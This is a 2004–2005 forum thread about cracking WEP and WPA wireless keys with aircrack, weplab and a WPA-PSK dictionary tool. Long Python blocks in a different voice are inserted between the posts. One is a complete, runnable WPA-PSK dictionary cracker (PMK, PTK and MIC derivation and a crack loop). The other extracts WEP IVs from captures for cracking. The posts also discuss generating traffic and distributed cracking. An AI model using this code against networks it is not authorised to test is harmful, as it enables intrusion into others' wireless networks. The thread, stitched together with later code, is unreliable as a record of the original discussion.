Page 10 of 10

PostPosted: Tue Oct 12, 2004 11:30 am
by chesh
One other thing I'd like to mention: when I do a weplab -a on my Kismet.dump file it says that there are XXXXX number of unique IVs which, when I check Kismet, seems to be the same number of data packets collected from my network. Does this seem right? The other number that Kismet shows is XXXX number of crypted packets collected, but that number doesn't seem to be referenced within weplab whatsoever. So, are unique IVs crypted packets, or just unique data packets?

chesh

PostPosted: Wed Oct 13, 2004 7:26 am
by chesh
chesh wrote:My second question is, how does one generate more packets in order to crack? I've heard talk of doing an arping or something to that extent to generate packets. Would someone post the info on how this is done, if you need two wireless adapters, or what? Thanks guys.

chesh


Ok, I jumped the gun a little bit on a couple of these questions. I tried aircrack last night for the first time with airodump and aireplay. I got myself a 770mb dump file with 880k of unique IV packets. My new question is, when I load this into aircrack it says there is 880k worth of unique packets, but when I load it into weplab it says there is only 88k worth of packets. Why the difference? Also, airodump says that the network is a 54mb WPA encrypted network, when I know it's a BEFW11S4 using 128-bit WEP. I further this knowing that aircrack is supposed to deny WPA packets when loading the dump file, and it loads all the packets just fine and starts away on its little cracking adventure. I have to say, if I didn't know it was 128-bit WEP and started a 64-bit crack on it, it finished and told me that a key didn't exist in about 34secs. This was with an aircrack fudge factor of 2. When I ran weplab, on the other hand, it took an hour or two to discover that it wasn't a 64-bit key. Anyways, just thought I'd post my findings; any comments, flames are more than welcome.

chesh

PostPosted: Fri Oct 15, 2004 7:33 am
by chesh
joswr1ght wrote:I'm not much for UI design (love those Unix tools though), but here goes. I'm going to release this tool in the first teaching of the SANS Wireless Auditing class in New Orleans in November (I am the author of this material), and will make it publicly available after that.

screen shot

This tool is an implementation of Robert Moskowitz's paper "Weakness in Passphrase Choice in WPA Interface" at http://wifinetnews.com/archives/002452.html. It kind of sucks, since it's pretty slow. I've done everything to optimize it that I believe can be done, but 4096 hmac-sha1 passes take quite a bit of time to derive the PMK from a dictionary word. I'm looking forward to comments after releasing publicly.

Thanks,

-Josh



I saw in the latest version of Auditor (auditor-081004-01) you've already released this tool to them. Since it's already in the public, when are you planning on releasing a source download to the masses?

chesh

PostPosted: Fri Oct 15, 2004 9:21 am
by joswr1ght
chesh wrote:I saw in the latest version of Auditor (auditor-081004-01) you've already released this tool to them. Since it's already in the public, when are you planning on releasing a source download to the masses?

chesh


11/3, right after the SANS WLAN Auditing course runs in New Orleans.

If anyone wants the source early and is willing to provide some feedback/testing, drop me a note at jwright@hasborg.com.

Thanks,

-Josh
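The cost Josh describes (4096 HMAC-SHA1 passes to turn one dictionary word into a PMK) is PBKDF2 as 802.11i specifies it. The block below is an added example, not Josh's tool and not KisMAC's code: it derives the PMK, expands it to the PTK with the 802.11i PRF, and checks a candidate against the Key MIC of a captured handshake message, which is what a WPA-PSK dictionary attack actually does. The MAC addresses, nonces, EAPOL-Key bytes and wordlist are constructed placeholders; the attack loop, PRF and MIC computation follow the standard.

```python
import hashlib
import hmac

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) per 802.11i.
    These 4096 HMAC-SHA1 passes are the cost Josh mentions; they dominate the attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    KCK = bytes 0..15, KEK = 16..31, TK = 32..63."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(5):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]

def eapol_mic(kck: bytes, eapol_frame: bytes, descriptor_version: int = 2) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (RSN/CCMP) HMAC-SHA1 cut to 16 bytes."""
    if descriptor_version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]

def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol_frame, target_mic, descriptor_version=2):
    """Dictionary attack: one PBKDF2 per candidate, then a cheap PTK derivation and MIC compare."""
    for word in wordlist:
        if not 8 <= len(word) <= 63:   # 802.11i passphrases are 8..63 characters; skip the rest
            continue
        pmk = pmk_from_passphrase(word, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, descriptor_version), target_mic):
            return word
    return None

# Constructed handshake material (not from any real capture): MACs, nonces and the
# EAPOL-Key body are placeholders; only their lengths and positions matter here.
SSID = "linksys"
AA = bytes.fromhex("000c41aabbcc")       # AP MAC, constructed
SPA = bytes.fromhex("00026f112233")      # station MAC, constructed
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = b"\x01\x03" + b"\x00" * 14 + SNONCE + b"\x00" * 16   # MIC field (last 16 bytes) zeroed
WORDLIST = ["12345678", "password", "linksys1", "changeme", "letmein"]

def constructed_mic(passphrase: str) -> bytes:
    """Stands in for the MIC an attacker reads out of message 2 of the captured 4-way handshake."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2)

def demo() -> str:
    """Recover the constructed network's passphrase from WORDLIST; returns "changeme"."""
    target = constructed_mic("changeme")
    return crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, EAPOL_MSG2, target)

if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Only `pmk_from_passphrase` is expensive, and it depends solely on the passphrase and the SSID, not on the handshake. That is why the PBKDF2 step is the one worth vectorising or farming out across machines, and why a table of PMKs precomputed for common SSIDs turns the rest of the attack into a handful of HMACs per candidate.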

PostPosted: Fri Oct 15, 2004 9:59 am
by devine
chesh wrote:When I load this into aircrack it says there is 880k worth of unique packets, but when I load it into weplab it says there is only 88k worth of packets. Why the difference?

Hard to tell. Post the first meg of your pcap file somewhere, this would help me and TopoLB to track down the problem.

chesh wrote:Also, airodump says that the network is a 54mb WPA encrypted network, when I know it's a BEFW11S4 using 128-bit WEP.

That's a known bug in airodump 2.1. Will be fixed in the next release.

chesh wrote:it finished and told me that a key didn't exist in about 34secs. This was with aircrack fudge factor of 2.

Maybe try increasing the fudge factor. Also if it's 802.1X aircrack will very likely fail.

post-edit: messed up with the version number

PostPosted: Fri Oct 15, 2004 10:01 am
by chesh
What's the easiest way to cut down my 770mb pcap file to 1mb?

chesh

PostPosted: Fri Oct 15, 2004 10:41 am
by joswr1ght
chesh wrote:What's the easiest way to cut down my 770mb pcap file to 1mb?

chesh


Sample the first few thousand packets with tcpdump:

$ tcpdump -r bigfile.dump -w smallfile.dump -c 2000

Repeat until the "-c" number gives you what you want.

Note: This will not work with tethereal, the "-c" behavior does not work when reading from a stored capture file.

-Josh

Speeding Up WPA PSK Attack

PostPosted: Sat Oct 16, 2004 4:26 am
by Kronk
Joshua,

The KisMAC tool implements the WPA PSK attack using G4 Altivec acceleration to improve performance significantly. Maybe you can do something similar with MMX with your WPA code.

The KisMAC source code is located at http://binaervarianz.de/projekte/programmieren/kismac/download.php and may be helpful.

Kronk

PostPosted: Sat Oct 16, 2004 4:31 am
by devine
Kronk wrote:The KisMAC tool implements the WPA PSK attack using G4 Altivec acceleration to improve performance significantly. Maybe you can do something similar with MMX with your WPA code.


Indeed. Also, I was thinking about distributed WPA-PSK cracking. Could speed up things quite a bit, especially if you have a few spare machines :)

PostPosted: Tue Jan 04, 2005 9:49 am
by grcore
chesh wrote:What's the easiest way to cut down my 770mb pcap file to 1mb?

chesh


Are you trying to filter out the IV packets?

Use ethereal to run a filter and save the output.

g

Working with wrt54g ?

PostPosted: Sun Feb 20, 2005 5:40 am
by net-titi
Would it work with a Linksys WRT54G router, like Kismet does?

PostPosted: Wed Feb 23, 2005 12:24 pm
by devine
chesh wrote:What's the easiest way to cut down my 770mb pcap file to 1mb?


Not many options right now, but that's a planned feature of airodump 2.2, which will make it possible to only save the IVs from a live capture session, or extract then save them from a pcap file. Each IV will use about 6 bytes: bssid_index(1) + IV_itself(3) + ciphertext_start(2). However, this new file format will only be understood by aircrack 2.2.
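Three questions in this thread come down to reading the pcap yourself: chesh's "are unique IVs crypted packets or data packets?", Josh's tcpdump -c trick for cutting a 770mb dump down, and devine's 6-byte IV record (bssid_index + IV + ciphertext_start). The block below is an added example, not airodump or aircrack code: it builds a small constructed capture of raw 802.11 frames (linktype 105, no radiotap header), counts data frames, protected frames and unique IVs per BSSID, truncates the file to its first N records the way `tcpdump -c` does, and emits IV records in the layout devine describes. The BSSID and station MACs are placeholders, and numbering BSSIDs in order of first appearance is my assumption; aircrack 2.2's actual file format is its own to define.

```python
import struct

LINKTYPE_IEEE802_11 = 105

def build_pcap(frames):
    """Little-endian pcap with raw 802.11 frames; constructed timestamps."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for n, f in enumerate(frames):
        out += struct.pack("<IIII", 1097000000 + n, 0, len(f), len(f)) + f
    return out

def iter_pcap(data):
    """Yield each record's frame bytes. Assumes a little-endian pcap whose frames are raw 802.11."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != 0xA1B2C3D4:
        raise ValueError("only little-endian pcap handled here")
    off = 24
    while off + 16 <= len(data):
        incl, = struct.unpack_from("<I", data, off + 8)
        off += 16
        yield data[off:off + incl]
        off += incl

def truncate_pcap(data, count):
    """Keep the global header and the first `count` records: tcpdump -r big -w small -c count."""
    off, kept = 24, 0
    while kept < count and off + 16 <= len(data):
        incl, = struct.unpack_from("<I", data, off + 8)
        off += 16 + incl
        kept += 1
    return data[:off]

def wep_fields(frame):
    """For an 802.11 data frame return (bssid, protected, iv, first 2 ciphertext bytes), else None.
    Assumes no QoS and no 4-address (WDS) frames, which is the 802.11b world of this thread."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2 or fc0 & 0x80:      # type 2 = data; subtype bit 7 = QoS data
        return None
    to_ds, from_ds = fc1 & 0x01, fc1 & 0x02
    if to_ds and from_ds:
        return None
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    bssid = a1 if to_ds else (a2 if from_ds else a3)
    protected = bool(fc1 & 0x40)
    if not protected or len(frame) < 30:
        return bssid, protected, None, None
    # WEP body: IV (3 bytes), key index byte, then ciphertext
    return bssid, True, frame[24:27], frame[28:30]

def capture_stats(data):
    """What Kismet counts (data frames, crypted frames) next to what weplab counts (unique IVs)."""
    data_frames = encrypted = 0
    ivs = set()
    for frame in iter_pcap(data):
        r = wep_fields(frame)
        if r is None:
            continue
        data_frames += 1
        bssid, protected, iv, _ = r
        if protected:
            encrypted += 1
            if iv is not None:
                ivs.add((bssid, iv))
    return {"data_frames": data_frames, "encrypted_frames": encrypted, "unique_ivs": len(ivs)}

def iv_records(data):
    """6-byte records, bssid_index(1) + IV(3) + ciphertext_start(2); index order is an assumption."""
    index, out = {}, b""
    for frame in iter_pcap(data):
        r = wep_fields(frame)
        if r is None or r[2] is None:
            continue
        bssid, _, iv, ct = r
        out += bytes([index.setdefault(bssid, len(index))]) + iv + ct
    return out

# Constructed capture: one beacon, three WEP data frames (one IV reused), one plaintext data frame.
BSSID = bytes.fromhex("000c41aabbcc")
STA = bytes.fromhex("00026f112233")
GW = bytes.fromhex("000c41aabbcd")

def wep_frame(iv, payload, protected=True):
    fc1 = 0x41 if protected else 0x01           # To-DS, plus Protected bit when WEP is on
    body = iv + b"\x00" + payload if protected else payload
    return bytes([0x08, fc1]) + b"\x00\x00" + BSSID + STA + GW + b"\x10\x00" + body

SAMPLE = build_pcap([
    b"\x80\x00\x00\x00" + b"\xff" * 6 + BSSID + BSSID + b"\x00\x00" + b"\x00" * 12,
    wep_frame(b"\x00\x00\x01", b"\xaa\xaa\x03" + b"\x00" * 8),
    wep_frame(b"\x00\x00\x02", b"\xbb\xcc\x03" + b"\x00" * 8),
    wep_frame(b"\x00\x00\x01", b"\xde\xad\x03" + b"\x00" * 8),
    wep_frame(b"", b"\xaa\xaa\x03\x00" + b"\x00" * 8, protected=False),
])

if __name__ == "__main__":
    print(capture_stats(SAMPLE))              # {'data_frames': 4, 'encrypted_frames': 3, 'unique_ivs': 2}
    print(len(truncate_pcap(SAMPLE, 2)))
    print(iv_records(SAMPLE).hex())
```

On a real capture the three counters answer chesh's question directly: unique IVs are a subset of the crypted data frames (an IV that a card reuses, or a frame too short to carry one, adds nothing), and the crypted count is in turn a subset of all data frames. Records of 6 bytes also show why devine's format matters for a 770mb dump: 880k IVs become about 5mb.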

PostPosted: Thu Apr 21, 2005 2:49 pm
by kleptophobiac
Wow, this is a massively long thread, and I will admit that I ceased reading about page 11.

1) Would you care to post the win32 source code somewhere? I'm interested in taking a peek at it, even though I'm terrible with C (I do java... need to work on C)

2) I popped wzcook into a hex editor and did the proper edits, and it works great. I figured I'd post the fixed binary, just so others wouldn't have to go download a hex editor. :) here

3) Thanks for the work!